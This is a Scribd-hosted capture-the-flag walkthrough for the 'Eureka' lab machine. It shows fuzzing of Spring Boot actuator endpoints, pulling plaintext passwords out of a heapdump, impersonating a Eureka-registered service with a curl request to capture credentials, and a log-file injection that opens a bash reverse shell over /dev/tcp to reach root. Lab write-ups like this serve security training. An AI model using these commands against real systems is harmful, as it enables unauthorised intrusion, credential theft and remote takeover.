Scribd
Upload
1K views3 pages

Eureka

The document outlines a penetration testing process targeting a Spring Boot application running on a server. It details steps for port scanning, gaining initial access through exposed files, and escalating privileges by impersonating a service to obtain further credentials. The final steps involve establishing a reverse shell for root access and retrieving the root flag.

Uploaded by

21r21a6238
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
1K views3 pages

Eureka

The document outlines a penetration testing process targeting a Spring Boot application running on a server. It details steps for port scanning, gaining initial access through exposed files, and escalating privileges by impersonating a service to obtain further credentials. The final steps involve establishing a reverse shell for root access and retrieving the root flag.

Uploaded by

21r21a6238
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 3

Eureka

Recon
Port scanning shows 3 open tcp ports, 22, 80 and 8761.
10.10.11.66 redirects to furni.htb, added to /etc/hosts
As port 8761, I googled the port and it is related to springboot
Used seclists springboot wordlist to fuzz furni.htb
ffuf -w /opt/wordlists/SecLists/Discovery/Web-Content/spring-boot.txt -u
http://furni.htb/FUZZ shows a lot of exposed files in /actuator/* directory.
Downloaded http://furni.htb/actuator/heapdump

Initial Foothold
Using strings and grep we got password of user oscar

strings heapdump |grep "password="


{password=0sc@r190_S0l!dP@sswd, user=oscar190}!

We also get another username password

strings heapdump |grep PWD


http://EurekaSrvr:0scarPWDisTheB3st@localhost:8761/eureka/!

SSH Port Forward 8761 to yourself:

ssh -L 8761:localhost:8761 oscar190@10.10.11.66


Password: 0sc@r190_S0l!dP@sswd

Priviledge Escalation 1
Now you have access to Eureka Admin http://localhost:8761
Start netcat listner to receive connection nc -lvnp 8081
Register a malicious fake service
Register a "new" instance like (Change YOURIP to your tun0 ip)
curl -X POST
http://EurekaSrvr:0scarPWDisTheB3st@127.0.0.1:8761/eureka/apps/USER-
MANAGEMENT-SERVICE -H 'Content-Type: application/json' -d '{
"instance": {
"instanceId": "USER-MANAGEMENT-SERVICE",
"hostName": "YOURIP",
"app": "USER-MANAGEMENT-SERVICE",
"ipAddr": "YOURIP",
"vipAddress": "USER-MANAGEMENT-SERVICE",
"secureVipAddress": "USER-MANAGEMENT-SERVICE",
"status": "UP",
"port": { "$": 8081, "@enabled": "true" },
"dataCenterInfo": {
"@class": "com.netflix.appinfo.InstanceInfo$DefaultDataCenterInfo",
"name": "MyOwn"
}
}
}'

You are impersonating USER-MANAGEMENT-SERVICE


Wait for 2 minutes to get connection in your netcat with credentials, username miranda-
wise and password IL!veT0Be&BeT0L0ve .
Now ssh using those credentials

ssh miranda-wise@10.10.11.66
pass : IL!veT0Be&BeT0L0ve
cat user.txt

Priviledge Escalation 2 rooting


then in attacker machine

nc -nlvp 9999

then in ssh shell of the target

rm -f /var/www/web/user-management-service/log/application.log
echo 'HTTP Status: x[$(/bin/bash -i >& /dev/tcp/<YOUR-IP>/9999 0>&1)]' >
/var/www/web/user-management-service/log/application.log

wait for two minutes, you will get root shell in your listener
Now just cat /root/root.txt in netcat shell

You might also like